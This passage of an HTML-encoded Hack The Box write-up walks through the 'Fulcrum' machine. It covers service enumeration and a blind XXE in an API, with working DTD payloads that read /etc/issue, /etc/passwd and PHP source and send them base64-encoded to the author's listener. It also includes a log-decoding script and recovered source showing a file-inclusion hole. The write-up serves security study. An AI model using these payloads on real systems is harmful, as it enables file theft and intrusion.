&lt;p&gt;Clicking to try again redirects you to &lt;code class=&quot;highlighter-rouge&quot;&gt;/index.php?page=home&lt;/code&gt;. Looking at this, we might be able to take advantage of a file include (or SSRF) type vulnerability just based on the &lt;code class=&quot;highlighter-rouge&quot;&gt;page&lt;/code&gt; parameter. @Jhaddix gave a great talk called &lt;a href=&quot;https://github.com/bugcrowd/HUNT/blob/master/slides/DEF%20CON%2025%20-%20HUNT.pdf&quot;&gt;“Hunt”&lt;/a&gt; at DEF CON; to sum it up, it’s an analysis of web vulnerabilities and the parameter names most commonly associated with each of them. I highly recommend reading the slides or watching the video of the talk, because it will help you recognize potential vulnerabilities in web applications much quicker.&lt;/p&gt;

&lt;p&gt;Running gobuster against the site reveals some additional content to explore.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/fulcrum# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.62:4 -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_fulcrum_4r_fulcrum_4

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.62:4/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 302,307,403,200,204,301
[+] Extensions   : .php,.html
=====================================================
/index.php (Status: 200)
/home.php (Status: 200)
/upload.php (Status: 200)
=====================================================
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Going directly to &lt;code class=&quot;highlighter-rouge&quot;&gt;http://10.10.10.62:4/home.php&lt;/code&gt; brings us to the Fulcrum file upload page.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/fulcrum/2.png&quot; alt=&quot;&amp;quot;Fulcrum File Upload&amp;quot;&quot; title=&quot;Fulcrum file upload&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Attempting to upload anything using the file upload capability always ends up with an error, even when uploading a regular unmodified image file.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/fulcrum/3.png&quot; alt=&quot;&amp;quot;Upload Failed Error Page&amp;quot;&quot; title=&quot;Upload File Error Page&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We are going to keep a note of this, because it will come in handy later.&lt;/p&gt;

&lt;h3 id=&quot;enumerating-port-80&quot;&gt;Enumerating Port 80&lt;/h3&gt;

&lt;p&gt;I also ran gobuster against this port in the background. For some reason the service throws (fake) IIS errors even though this is an Ubuntu server running nginx. You could tell right off the bat that this service was fake news and was likely a rabbit hole, so I didn’t spend any resources digging deeper.&lt;/p&gt;

&lt;h3 id=&quot;enumering-port-88-phpmyadmin&quot;&gt;Enumerating Port 88 (phpMyAdmin)&lt;/h3&gt;

&lt;p&gt;I attempted to authenticate with various combinations of common usernames and passwords seen on Hack the Box machines, e.g. &lt;code class=&quot;highlighter-rouge&quot;&gt;root:root&lt;/code&gt;, &lt;code class=&quot;highlighter-rouge&quot;&gt;admin:admin&lt;/code&gt;, &lt;code class=&quot;highlighter-rouge&quot;&gt;admin:password&lt;/code&gt; etc.&lt;/p&gt;

&lt;p&gt;Every time you attempt to authenticate, the following error message is returned.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/fulcrum/5.png&quot; alt=&quot;&amp;quot;PHPmyAdmin SQL Error&amp;quot;&quot; /&gt;
From some quick &lt;a href=&quot;http://www.codecheese.com/2011/04/2002-the-server-is-not-responding-or-the-local-mysql-servers-socket-is-not-correctly-configured/&quot;&gt;google searching&lt;/a&gt; this likely meant that the MySQL server is misconfigured or not accepting connections, which likely means this was just another rabbit hole.&lt;/p&gt;

&lt;h3 id=&quot;enumerating-port-9999-pfsense&quot;&gt;Enumerating Port 9999 (PFSense)&lt;/h3&gt;

&lt;p&gt;Visiting the service on port &lt;code class=&quot;highlighter-rouge&quot;&gt;9999&lt;/code&gt; brings us to the homepage of &lt;a href=&quot;https://www.pfsense.org/&quot;&gt;PFsense&lt;/a&gt; (an open-source firewall).&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/fulcrum/4.png&quot; alt=&quot;&amp;quot;PFSense&amp;quot;&quot; title=&quot;PFSense&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Attempting the default credentials for &lt;a href=&quot;https://www.netgate.com/docs/pfsense/usermanager/pfsense-default-username-and-password.html&quot;&gt;pfSense&lt;/a&gt;, in addition to the common Hack the Box username/password combinations, resulted in nothing.&lt;/p&gt;

&lt;p&gt;You can observe from the footer copyright (which states 2004-2018) that this is likely the latest version of pfSense. Another indicator you can use, if you are familiar with pfSense and how it looked in the past: within the last two (?) years they switched the &lt;a href=&quot;https://www.netgate.com/blog/bootstrapped-webgui-update.html&quot;&gt;web interface UX styling&lt;/a&gt; framework from their (not so pretty) custom styling to Bootstrap. If you view the source code of the page you see the Bootstrap includes, which lets you know that this is likely another rabbit hole.&lt;/p&gt;

&lt;h3 id=&quot;enumerating-port-56423-fulcrum-api&quot;&gt;Enumerating Port 56423 (FulCrum API)&lt;/h3&gt;

&lt;p&gt;Visiting the service on Port &lt;code class=&quot;highlighter-rouge&quot;&gt;56423&lt;/code&gt; brings us to what appears to be some sort of “API” endpoint.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/fulcrum/10.png&quot; alt=&quot;&amp;quot;Fulcrum API&amp;quot;&quot; title=&quot;Fulcrum API&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Hitting it with gobuster reveals that it only has a single resource available for us to hit.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/fulcrum# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.62:56423 -x php,html -s 200,204,301,302,307,403 -t 100 | tee gobuster_fulcrum_56423

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.62:56423/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 403,200,204,301,302,307
[+] Extensions   : .php,.html
=====================================================
/index.php (Status: 200)
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;People generally skip over some of the inner thought process of discovering vulnerabilities. But in this case, we have no real way of interacting with the API that’s available, so we are likely looking for some sort of blind injection vulnerability (OS, XPath, XXE, SQLi etc.). We can pretty much rule out SQL injection because, from our earlier enumeration, the SQL database wasn’t functioning.&lt;/p&gt;

&lt;p&gt;After attempting a variety of blind injection attacks, you end up discovering it’s a blind XXE vulnerability. The following &lt;a href=&quot;https://blog.zsec.uk/blind-xxe-learning/&quot;&gt;blog post&lt;/a&gt; is a good read on exploiting XXE vulnerabilities.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/fulcrum/6.png&quot; alt=&quot;&amp;quot;Testing for XXE Vulnerability w/ Burp Suite&amp;quot;&quot; title=&quot;Testing for XXE Vulnerability w/ Burp Suite&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;xxe test payload&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&amp;gt;&lt;/span&gt;
&lt;span class=&quot;cp&quot;&gt;&amp;lt;!DOCTYPE data SYSTEM &quot;http://10.10.14.19:3434/&quot; [
&amp;lt;!ELEMENT data (#PCDATA)&amp;gt;&lt;/span&gt;
]&amp;gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;data&amp;gt;&lt;/span&gt;4&lt;span class=&quot;nt&quot;&gt;&amp;lt;/data&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;response&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/fulcrum# ncat -lnkvp 3434
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::3434
Ncat: Listening on 0.0.0.0:3434
Ncat: Connection from 10.10.10.62.
Ncat: Connection from 10.10.10.62:53288.
GET /test-t HTTP/1.0
Host: 10.10.14.19:3434
Connection: close
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;So now we know what the vulnerability is, and we have a working “proof of concept”. We can safely say that this is going to be the entry point into the box, so now it’s time to dive deeper.&lt;/p&gt;

&lt;h2 id=&quot;exploitation&quot;&gt;Exploitation&lt;/h2&gt;
&lt;h3 id=&quot;using-blind-xxe-to-read-source-code-files&quot;&gt;Using Blind XXE to Read Source Code Files&lt;/h3&gt;

&lt;p&gt;Honestly, this part &lt;em&gt;fucking sucked&lt;/em&gt; for me. For some reason I’m awful at either following instructions, or there was something else going on. But one thing’s for sure, I clearly didn’t know how XXE worked properly, which made the following section take &lt;em&gt;forever&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;I used a combination of the following resources, and finally put together a stable formula for performing the OOB XXE. I’m not 100% sure if it was intended, but using the &lt;code class=&quot;highlighter-rouge&quot;&gt;php://filter&lt;/code&gt; wrapper was pretty much a requirement to pull data out through XXE (no other methods seemed to work). If you are just interested in getting the shell, it’s safe to skip this section.&lt;/p&gt;

&lt;p&gt;I recommend reading the following resources to understand the different ways we can take advantage of an XXE vulnerability.&lt;/p&gt;

&lt;p&gt;Links: &lt;a href=&quot;https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf&quot;&gt;1&lt;/a&gt; | &lt;a href=&quot;https://blog.zsec.uk/out-of-band-xxe-2/&quot;&gt;2&lt;/a&gt; | &lt;a href=&quot;https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870&quot;&gt;3&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/htb/fulcrum/7.png&quot; alt=&quot;&amp;quot;Using XXE to Request contents of &amp;quot;/etc/issue&amp;quot;&amp;quot;&quot; title=&quot;Using XXE to Request contents of &amp;quot;/etc/issue&amp;quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Contents of test.dtd&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/fulcrum/serve# cat test.dtd
  &amp;lt;!ENTITY % payl SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///etc/issue&quot;&amp;gt;
  &amp;lt;!ENTITY % intern &quot;&amp;lt;!ENTITY &amp;amp;#37; xxe SYSTEM 'http://10.10.14.128/result?%payl;'&amp;gt;&quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Upon successful exploitation we should receive the contents of &lt;code class=&quot;highlighter-rouge&quot;&gt;/etc/issue&lt;/code&gt; as a &lt;code class=&quot;highlighter-rouge&quot;&gt;base64&lt;/code&gt; encoded string.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/fulcrum/serve# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.62 - - [20/Jun/2018 21:46:50] &quot;GET /test.dtd HTTP/1.0&quot; 200 -
10.10.10.62 - - [20/Jun/2018 21:46:50] code 404, message File not found
10.10.10.62 - - [20/Jun/2018 21:46:50] &quot;GET /result?Q3JlYXRlZCBieTogQE9uZUxvZ2ljYWxNeXRoCklQIEFkZHJlc3M6IFw0e2VuczMyfQpIb3N0bmFtZTogICBcbgoKR29vZCBMdWNrIQoKCg== HTTP/1.0&quot; 404 -
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Decoding it gives us the following content.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ echo -n &quot;Q3JlYXRlZCBieTogQE9uZUxvZ2ljYWxNeXRoCklQIEFkZHJlc3M6IFw0e2VuczMyfQpIb3N0bmFtZTogICBcbgoKR29vZCBMdWNrIQoKCg==&quot; | base64 -d
Created by: @OneLogicalMyth
IP Address: \4{ens32}
Hostname:   \n

Good Luck!
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
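&lt;p&gt;The decode step above is one-off shell work. As an added example (not part of the original write-up, and not the box author’s code), the following Python script generalises it to the access log of the collecting web server: it pulls every hit on the &lt;code class=&quot;highlighter-rouge&quot;&gt;/result?&lt;/code&gt; collector path, undoes URL encoding, repairs missing base64 padding and decodes the blob, dropping hits that are not valid base64. The log lines are constructed to match the &lt;code class=&quot;highlighter-rouge&quot;&gt;http.server&lt;/code&gt; output shown above; the blob is the one returned for &lt;code class=&quot;highlighter-rouge&quot;&gt;/etc/issue&lt;/code&gt;. The same routine is what you would run over your own web server logs when triaging a suspected XXE exfiltration, since the exfiltrated data lands in the request line of the collector.&lt;/p&gt;

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed sample of python3 http.server access-log output, modelled on the
# lines shown in the write-up. The long blob is the one the box returned for
# /etc/issue; the other lines are filler to show the filter skipping them.
SAMPLE_LOG = """\
10.10.10.62 - - [20/Jun/2018 21:46:50] "GET /test.dtd HTTP/1.0" 200 -
10.10.10.62 - - [20/Jun/2018 21:46:50] code 404, message File not found
10.10.10.62 - - [20/Jun/2018 21:46:50] "GET /result?Q3JlYXRlZCBieTogQE9uZUxvZ2ljYWxNeXRoCklQIEFkZHJlc3M6IFw0e2VuczMyfQpIb3N0bmFtZTogICBcbgoKR29vZCBMdWNrIQoKCg== HTTP/1.0" 404 -
10.10.10.62 - - [20/Jun/2018 21:47:02] "GET /result?not-base64!! HTTP/1.0" 404 -
"""

# Matches the request line of a hit on the collector path and captures the
# query string (everything after "?" up to the protocol version).
REQUEST_RE = re.compile(r'"GET /result\?(\S+) HTTP/1\.[01]"')


def decode_exfil_blob(blob):
    """Decode one base64 blob lifted from a query string.

    php://filter/read=convert.base64-encode emits standard base64, but by the
    time it travels through a URL the padding may be percent-encoded or
    stripped, so undo URL encoding and repair padding before decoding.
    Returns None when the blob is not valid base64.
    """
    raw = unquote(blob)
    raw += "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def extract_exfil(log_text):
    """Walk an access log and return a list of (blob, decoded_text) pairs for
    every hit on the collector path whose query decodes cleanly."""
    found = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        decoded = decode_exfil_blob(match.group(1))
        if decoded is not None:
            found.append((match.group(1), decoded))
    return found


if __name__ == "__main__":
    for blob, text in extract_exfil(SAMPLE_LOG):
        print("--- blob starting", blob[:24], "---")
        print(text)
```

&lt;p&gt;Run against the constructed log, the script yields exactly one decoded record, the &lt;code class=&quot;highlighter-rouge&quot;&gt;/etc/issue&lt;/code&gt; banner shown above, and silently discards the junk hit. Feed it the real log file instead of &lt;code class=&quot;highlighter-rouge&quot;&gt;SAMPLE_LOG&lt;/code&gt; and every file pulled through the DTD comes back decoded in one pass.&lt;/p&gt;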

&lt;p&gt;By changing the file referenced in &lt;code class=&quot;highlighter-rouge&quot;&gt;test.dtd&lt;/code&gt; we can exfiltrate sensitive files for further analysis, for example the contents of &lt;code class=&quot;highlighter-rouge&quot;&gt;/etc/passwd&lt;/code&gt; or the Fulcrum API source code.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root:x:0:0:root:/root:/bin/bash
....[snip]....
messagebus:x:108:111::/var/run/dbus:/bin/false
blueprint:x:1000:1000:blueprint,,,:/home/blueprint:/bin/bash
colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
libvirt-qemu:x:64055:115:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:110:118:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;Fulcrum API Source Code&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;language-php highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt;
        &lt;span class=&quot;nb&quot;&gt;header&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'Content-Type:application/json;charset=utf-8'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
        &lt;span class=&quot;nb&quot;&gt;header&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'Server: Fulcrum-API Beta'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
        &lt;span class=&quot;nb&quot;&gt;libxml_disable_entity_loader&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kc&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
        &lt;span class=&quot;nv&quot;&gt;$xmlfile&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;file_get_contents&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'php://input'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
        &lt;span class=&quot;nv&quot;&gt;$dom&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;nx&quot;&gt;DOMDocument&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;();&lt;/span&gt;
        &lt;span class=&quot;nv&quot;&gt;$dom&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;loadXML&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$xmlfile&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;LIBXML_NOENT&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;LIBXML_DTDLOAD&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
        &lt;span class=&quot;nv&quot;&gt;$input&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;simplexml_import_dom&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$dom&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
        &lt;span class=&quot;nv&quot;&gt;$output&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$input&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span class=&quot;na&quot;&gt;Ping&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;c1&quot;&gt;//check if ok
&lt;/span&gt;        &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$output&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;Ping&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;nv&quot;&gt;$data&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'Heartbeat'&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&amp;gt;&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'Ping'&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&amp;gt;&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;Ping&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;));&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;else&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;nv&quot;&gt;$data&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'Heartbeat'&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&amp;gt;&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'Ping'&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&amp;gt;&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;Pong&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;));&lt;/span&gt;
        &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;json_encode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;


&lt;span class=&quot;cp&quot;&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;From our earlier enumeration we know that there are other applications running on this box with known file names (results from enumerating the Fulcrum web service on port 4). Attempting to access one of the known files like &lt;code class=&quot;highlighter-rouge&quot;&gt;home.php&lt;/code&gt; ends with nothing being returned, which likely means the other web apps are separated into different directories.&lt;/p&gt;

&lt;p&gt;Trying common web directory names like &lt;em&gt;www, html, web, upload, uploads&lt;/em&gt;, you discover that there is web content being served from the &lt;code class=&quot;highlighter-rouge&quot;&gt;uploads&lt;/code&gt; directory, which happens to be the content of the Fulcrum web application hosted on port 4.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;dtd payload for discovering content in uploads web directory&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/fulcrum/serve# cat test.dtd  


&amp;lt;!ENTITY % payl SYSTEM &quot;php://filter/read=convert.base64-encode/resource=../uploads/index.php&quot;&amp;gt;  
&amp;lt;!ENTITY % intern &quot;&amp;lt;!ENTITY &amp;amp;#37; xxe SYSTEM 'http://10.10.14.128/result?%payl;'&amp;gt;&quot;&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;results&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;10.10.10.62 - - [20/Jun/2018 22:32:34] &quot;GET /result?PD9waHAKaWYoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gIT0gIjEyNy4wLjAuMSIpCnsKCWVjaG8gIjxoMT5VbmRlciBNYWludGFuY2U8L2gxPjxwPlBsZWFzZSA8YSBocmVmPVwiaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX0FERFInXSAuICI6NC9pbmRleC5waHA/cGFnZT1ob21lXCI+dHJ5IGFnYWluPC9hPiBsYXRlci48L3A+IjsKfWVsc2V7CgkkaW5jID0gJF9SRVFVRVNUWyJwYWdlIl07CglpbmNsdWRlKCRpbmMuIi5waHAiKTsKfQo/PgoK HTTP/1.0&quot; 404 -
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Un-Base64’ing the response gives you the contents of &lt;em&gt;index.php&lt;/em&gt;.&lt;/p&gt;

&lt;div class=&quot;language-php highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'REMOTE_ADDR'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;127.0.0.1&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;&amp;lt;h1&amp;gt;Under Maintance&amp;lt;/h1&amp;gt;&amp;lt;p&amp;gt;Please &amp;lt;a href=&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;http://&quot;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$_SERVER&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'SERVER_ADDR'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;:4/index.php?page=home&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&quot;&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&amp;gt;try again&amp;lt;/a&amp;gt; later.&amp;lt;/p&amp;gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;else&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;nv&quot;&gt;$inc&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$_REQUEST&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;page&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;];&lt;/span&gt;
	&lt;span class=&quot;k&quot;&gt;include&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$inc&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;.php&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;cp&quot;&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;Contents of home.php&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;language-php highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class=&quot;cp&quot;&gt;?&amp;gt;&lt;/span&gt;
&lt;span class=&quot;cp&quot;&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;html&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;h1&amp;gt;&lt;/span&gt;Fulcrum File Upload&lt;span class=&quot;nt&quot;&gt;&amp;lt;/h1&amp;gt;&lt;/span&gt;

